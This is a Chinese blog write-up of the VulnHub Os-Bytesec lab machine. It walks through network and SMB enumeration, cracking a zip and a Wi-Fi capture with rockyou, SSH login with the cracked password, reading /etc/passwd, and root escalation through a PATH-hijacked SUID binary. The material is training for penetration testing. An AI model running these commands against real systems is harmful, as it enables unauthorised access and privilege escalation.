bytesec靶场

已于 2023-08-15 17:25:07 修改
阅读量112 收藏
点赞数
分类专栏: Web安 网络安全学习 文章标签: 安全 web安全
于 2023-08-15 16:32:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56414082/article/details/132301945
版权

靶场下载

https://www.vulnhub.com/entry/hacknos-os-bytesec,393/

下载完成后进入配置修改网卡

教程

配置

第一步:启动靶机时按下 shift 键,

  • 进入以下界面

image-20230811104648298

第二步:选择第二个选项,然后按下 e 键,进入编辑界面

image-20230811104707659

将这里的ro修改为rw single init=/bin/bash,然后按ctrl+x,进入一个相当于控制台的界面,里面可以执行命令

image-20230811104721458

ip a 查看一下实际用的网卡,这里是ens33

image-20230811104737405

vim /etc/network/interfaces 看一下配置信息用的是哪一个网卡,如果不一致,则将这两个都改成 ens33

  • 按下 i 即可进入编辑模式

image-20230811104752952

/etc/init.d/networking restart 重启网卡服务

一、发现主机

工具nmap及netdiscover

nmap -sP 192.168.16.0/24

or

netdiscover -i eth0 -r 192.168.16.0/24

image-20230815105541557

登录验证:

image-20230815105557214

获取详细信息

nmap -sV -sC -A  192.168.16.175

可知版本号,常见开放端口等

image-20230815105756849

二、扫描目录

工具gobuster

gobuster  dir -u http://192.168.16.175    -w /usr/share/wordlists/dirbuster/directory-list-2.3-sma

image-20230815110115521

工具 dirsearch

dirsearch -u http://192.168.16.175/

image-20230815112039284

访问扫描到的目录,发现基本都是图片,没有什么可以利用的信息

三、 smb服务漏洞

刚刚扫描中有发现smb服务,

445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)

文件共享服务(SMB)解释:

通过网络提供文件共享服务,提供文件下载和上传服务(类似于FTP服务器)

工具 smbmap

SMBMap允许用户枚举整个域中的samba共享驱动器。用户可以使用该工具列出共享驱动器、驱动器权限、共享内容、上传/下载功能、文件名自动下载模式匹配,甚至远程执行命令。该工具原本的设计初衷是为了简化在大型网络中搜索潜在敏感数据的过程。

smbmap -H 192.168.16.175

这里显示没有权限:NO ACCESS

image-20230815114116772

工具enum4linux

Enum4linux是用于枚举windows和Linux系统上的SMB服务的工具。可以轻松的从与SMB服务有关的目标中快速提取信息。

enum4linux 192.168.16.175

image-20230815114618934

显示用户名保存下

image-20230815114754857

尝试登录

smbmap -H 192.168.16.175 -u 用户名

使用 smb用户发现是可读的,应该是没有密码

image-20230815115202983

工具smbclinet

smbclient是客户端软件,是测试与Windows共享连接的有用工具。它可用于传输文件或查看共享名。

直接连接:

smbclient//192.168.16.175 -U smb

报错:

image-20230815115911251

这里猜测是隐藏文件

访问

smbclient //192.168.16.175/smb  -U smb

成功连接并可以执行命令

image-20230815120024739

发现一个main.txt文件和一个safe.zip压缩文件,直接查看失败

下载到本地进行查看

get main.txt

get safe.zip

image-20230815140741410

main.txt中没有东西,safe.zip中有密码

解密 工具:fcrackzip 破解压缩文件

Fcrackzip是一款专门破解zip类型压缩文件密码的工具,工具小巧方便、破解速度快,能使用字典和指定字符集破解,适用于linux、mac osx 系统。

部分重要参数说明

-b 表示使用暴利破解的方式
-c 'aA1' 表示使用大小写字母和数字混合破解的方式
-l 1-10 表示需要破解的密码长度为1到10位
-u 表示只显示破解出来的密码,其他错误的密码不显示出
-D 表示要使用字典破解
-p 表示要使用那个字典破解

注:Kali linux自带了一些字典在/usr/share/wordlists/文件夹下。

这里使用的字典为rockyou.txt需要在kali中解压后使用

gzip -d /usr/share/wordlists/rockyou.txt.gz

语法:

fcrackzip  -D -p /usr/share/wordlists/rockyou.txt  -u  safe.zip

image-20230815142203970

解压后,里面一个图片和一个cap文件,使用wireshark打开,但是没有发现什么可用信息。

图片查看:exiftool secret.jpg

image-20230815143314957

image-20230815143054164

工具aircrack-ng 猜测数据包

Aircrack-ng是一款用于无线网络渗透测试的工具,它可以扫描无线网络、捕获数据包、破解密码等。

流量包中可能存在密码使用工具猜解密码

aircrack-ng -w /usr/share/wordlists/rockyou.txt user.cap

密码可能是 snowflake,账号在刚刚得到的三个中进行尝试

image-20230815150404561

ssh远程登陆

ssh     blackjax@192.168.16.175 -p 2525

输入密码:snowflake登录成功,更改为bash模式

image-20230815150903356

查看当前存在的用户

cat /etc/passwd

image-20230815151057759

返回得到第一个flag

image-20230815151203482

四、劫持命令提权

1.查找出具有suid权限的文件

SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了

已知的可用来提权的linux可行性的文件列表如下:
nmap
vim
find
bash
more
less
nano
cp

查找语句

find / -perm -u=s -type f 2>/dev/null

image-20230815155246089

发现netscan命令

2.分析netscan文件

查看

netstat -anpt

netscan
两条命令,执行结果基本一致

image-20230815160950543

xxd命令可以为给定的标准输入或者文件做一次十六进制的输出

这里使用xxd是因为文件是C编译的

xxd /usr/bin/netscan | less

可以看到该文件这边是调用了netstat -anpt命令

image-20230815161320887

确认该文件为root权限

image-20230815161518194

3.添加劫持

cd /tmp/
这里要先切换到临时目录

echo "/bin/sh" >netstat

#在临时目录创建一个文件调用netstat这个命令 

chmod 777 netstat

export PATH=/tmp:$PATH   

#意思是可执行文件的路径包括原先设定的路径,也包括从“路径1”到“路径n”的所有路径。

image-20230815162912379

最后执行netscan,提权成功

image-20230815162855293

查看获取flag

# cd /home/blackjax
# ls
user.txt
# cat user.txt

image-20230815163042895

阿凯6666
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
vulnhub靶场之hackNos:Os-Bytesec
qq_34613171的博客
02-13 488
难度:中级 标记:2标记第一个用户和第二个根 学习:利用| 中小企业| 枚举 速记| 特权提升 联系…https://www.linkedin.com/in/rahulgehlaut/ 我们建议您对此虚拟机使用VirtualBox而不是VMware 做了端口扫描,发现开了 80 ,139 ,445 ,2525 这里可能有SMB共享。 2525是SSH。 查看页面源代码 ,发现提示 get s...
靶机hackNos Os-Bytesec练习报告1
08-08
id=1yBuih2CsBx45oTUDpFr4JldrzkaOTTeZ https://download.vulnhub.com/hacknos/Os-Byt
Os-ByteSec
Forever_Han13的博客
03-18 4895
$ sudo nmap -sP 192.168.0.1/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-18 06:31 CST Nmap scan report for 192.168.0.1 Host is up (0.00044s latency). MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies) Nmap scan report fo
Vulnhub:Os-Bytesec靶机渗透
m0_62008601的博客
12-04 1105
基本的渗透过程以及linux下的PATH环境变量提权
【甄选靶场】Vulnhub百个项目渗透——项目四十八:HACKNOS:OS-BYTESEC(压缩包爆破,无线爆破,环境变量挟持提权)
人间体佐菲的博客
10-22 576
【甄选靶场】Vulnhub百个项目渗透——项目四十八:HACKNOS:OS-BYTESEC(压缩包爆破,无线爆破,环境变量挟持提权)
HACKNOS_ OS-BYTESEC
LainWith的博客
01-09 1160
目录介绍信息收集主机发现网站探测目录扫描使用nmap漏扫 smb 服务SMBMap枚举Samba共享驱动器enum4linux枚举Sambasmbclient访问samba服务器爆破压缩包查看压缩包连接靶机第一个FlagSUID特权-第二个Flag参考 介绍 难度:中级 Flag : 2 Flag first user And second root Learning : exploit | SMB | Enumration | Stenography | Privilege Escalation 靶机地址
靶机hackNos Os-Bytesec练习报告
黑战士的博客
05-21 997
1. 之前只接触过windows下的smb漏洞,首次了linux下的smb的扫描和利用方式\2. 学习了suid的linux提权工具,多角度考虑提权方式,不要死磕一种方式。
Os-ByteSec靶机
m0_61995767的博客
07-16 552
Os-ByteSec打靶记录
os-bytesec靶机
weixin_73074638的博客
07-14 352
开启了4个服务访问80端口。
vulnhub靶机 Os-ByteSec
weixin_46107179的博客
03-05 3904
Os-ByteSec靶机下载地址: https://www.vulnhub.com/entry/hacknos-os-bytesec,393/ 如果下载下来放入虚拟机中没有ip,请参考我的Os-hackNos-1前边部分 搭载好环境之后,进行主机扫描,得到相应的ip地址
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
lupai的博客
07-24 177
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
网络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 698
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
大坝安全监测设备有哪些主要功能?
yyth13276363312的博客
07-24 153
12。3. **实时预警和报警处理**:提供精准的安全预警信息,及时处理可能的危险情况12。1. **实时监测大坝的各项物理参数**:包括应变、位移、水位、流量等12。6. **环境量监测**:包括上/下游水位、气温、降水量等11
“微软蓝屏”事件暴露了网络安全哪些问题?
嫦娥妹妹等等我的博客
07-24 107
微软蓝屏”事件暴露了操作系统和软件在更新、驱动管理、恶意软件防护、配置管理及用户教育方面的网络安全问题。为防止此类问题,应重视系统维护和网络安全,定期更新、应用补丁、使用最新的安全软件,并保持良好的安全习惯。
HDShredder 7 企业版案例分享: 依照国际权威标准,安全清除企业数据
sanyuan7783的博客
07-24 625
符合国际权威标准软件操作符合多种主流国际权威标准,包括 DoD 5200, BSI, VSITR, NCSC, NIST 及 GOST,支持擦除单个分区和区域,并可自由定制擦除模式。对于“Clear”清除级别,软件操作符合 ISO 27001, DIN 66399 以及 NIST SP 800-88R1要求。对于“Purge”级别,则使用 SecureErase 功能。安全擦除证书软件生成准确的安全清除证书,包括时间戳、序列号、以及清除过程的所有细节信息。远程擦除 - 使用 NetDisk 技术。
深入探讨:如何在Shopee平台上安全运营多个店铺?
Ssm2022的博客
07-24 266
因为每个IP相关信息会被收录形成独特的浏览器指纹,浏览器指纹是一种通过收集和识别用户浏览器特征来跟踪和识别用户的技术。在跨境电商中,特别是运营多个店铺的商家,浏览器指纹可能被电商平台用于判断账号之间的关联。所以,当Shopee检测到一IP多店铺时,会认为商家存在恶意倾销等行为,从而封禁你的账号。这是一个关乎账号安全和业务持续性的重要问题。浏览器保存的账号、密码、支付信息等数据,以及注册资料、法人信息的重复使用,也可能导致账号被关联。通过这些措施,卖家可以有效降低店铺被关联的风险,保障业务的持续和稳定发展。
充电桩浪涌保护方案—保障充电设施安全稳定运行的关键
最新发布
Leiditech_的博客
07-24 541
大功率TVS二极管则以其极快的响应速度(纳秒级)和精准的电压钳位能力,对残余的浪涌进行进一步抑制,确保后端电路的安全。然而,由于其复杂的电气环境和暴露于户外的特点,充电桩容易受到浪涌的影响。浪涌可能来自雷电、电网故障、大功率设备的启停等,对充电桩的电子设备和储能系统造成严重损害。它具有超强的浪涌吸收能力和抑制电压能力,在实际应用中通常并接在电路中,既能解决雷击大浪涌问题,又能对静电起到超强的防护效果。3. 设备启停:大功率设备(如电动机、变压器等)的启动和停止会引起线路中的电流和电压突变,产生浪涌。
邮件安全篇:企业电子邮件安全涉及哪些方面?
sdexcel的专栏
07-20 1224
企业邮件安全涉及多个方面,旨在保护电子邮件通信的机密性、完整性和可用性,防止数据泄露、欺诈、滥用及其他安全威胁。本文从身份验证与防伪、数据加密、反垃圾邮件和反恶意软件防护、邮件内容过滤与审计、访问控制与权限管理、邮件存储与归档安全、合规性要求、灾备与恢复、用户安全意识培训、邮件系统维护与更新、移动设备管理等几个方面分别介绍。
windows压缩包爆破
08-13
要在Windows上进行压缩包的爆破,您可以使用工具rarcrack。rarcrack可以指定要爆破的文件类型,如rar、zip、7z,并可以定义最大长度等参数。它最大支持12线程来加速爆破过程。使用命令rarcrack [压缩包路径 -threads 12 -type [压缩包类型可以进行爆破操作。然而,需要注意的是,爆破过程可能需要一定的时间,并且并不保证一定能成功破解密码。有时候可能会出现没有结果或速度较慢的情况。另外,如果您需要爆破zip压缩包,您还可以使用工具fcrackzip。使用命令fcrackzip [压缩包路径可以进行zip压缩包的爆破。 [2] 引用 > [保存密码哈希的文件可以提取密码哈希。然后使用John the Ripper等工具进行破解。 [3<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [如何才能简洁高效不失优雅的爆破ZIP文件?](https://blog.csdn.net/zxsctf/article/details/131356650)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [【甄选靶场】Vulnhub百个项目渗透——项目四十八:HACKNOS:OS-BYTESEC(压缩包爆破,无线爆破,环境变量...](https://blog.csdn.net/weixin_65527369/article/details/127443994)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

阿凯6666

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值